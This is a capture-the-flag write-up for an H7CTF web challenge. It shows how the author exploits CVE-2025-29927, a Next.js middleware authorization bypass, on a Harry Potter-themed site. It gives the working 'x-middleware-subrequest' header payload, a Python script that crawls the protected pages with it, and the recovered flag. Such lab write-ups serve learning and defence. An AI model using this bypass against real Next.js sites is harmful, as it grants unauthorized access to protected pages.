The challenge showed us some kind of Harry Potter’s landing page. Based on the above description, I already knew this challenge will involve a latest CVE.
When it comes to web challenge, I always take a sneak peek on the page source itself to see if I can identify the tech stack or any hint within the challenge.
Yep! They always gave me something. As we can see, there are few static files path started with /_next/static/...... Therefore, I can conclude that this challenge is using NextJS framework.
I keep exploring the challenge and arrived at the Faculty page. Nothing interesting but Dumbledore’s profile is quite different and have a button that will redirect us to his office.
Unfortunately, his office page is protected and redirect us immediately to the login page. I assume this is the part that I need to bypass. I try to do some googling and searching on the recent NextJS CVE and I found below page that explained about the CVE.
https://github.com/lirantal/vulnerable-nextjs-14-CVE-2025-29927
Let’s try to implement the PoC exploit in the challenge. Firstly, I need to know the protected endpoint that I need to bypass. It’s very simple and I can get it from the inspect element which is /forbidden/dumbledore-office.
By intercepting the request, I modified the header by adding x-middleware-subrequest header via BurpSuite.
Payload:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
Now, let’s forward the request!
BINGO! It works but the flag seems not in this page and there are few buttons and link in the bypassed page too. Therefore, I developed an exploit script to bypass the login and try every each of the protected link within the Dumbledore’s office page until it reach the flag.
import requests as req
import re
from bs4 import BeautifulSoup
payload = "middleware:middleware:middleware:middleware:middleware"
headers = {"x-middleware-subrequest": payload}
BASE_URL = "http://34.180.7.168:41832"
url = f"{BASE_URL}/forbidden/dumbledore-office"
r = req.get(url, headers=headers, allow_redirects=True)
soup = BeautifulSoup(r.content, 'html.parser')
links = soup.find_all('a', href=True)
pattern = re.compile(r'^/forbidden/.+')
matching_links = [link['href'] for link in links if pattern.match(link['href'])]
for link in matching_links:
new_url = BASE_URL + link
print(f"Finding flag in {new_url}")
exploit = req.get(new_url, headers=headers, allow_redirects=True)
match = re.search(r'H7CTF\{.*?\}', exploit.text)
if match:
print("Flag:",match.group())
break;
Flag: H7CTF{al0ha_m1ddl3ware_m1ddl3ware_m1ddl3ware_976b83a9-7377-4867-b195-dd1ad9f16d9e}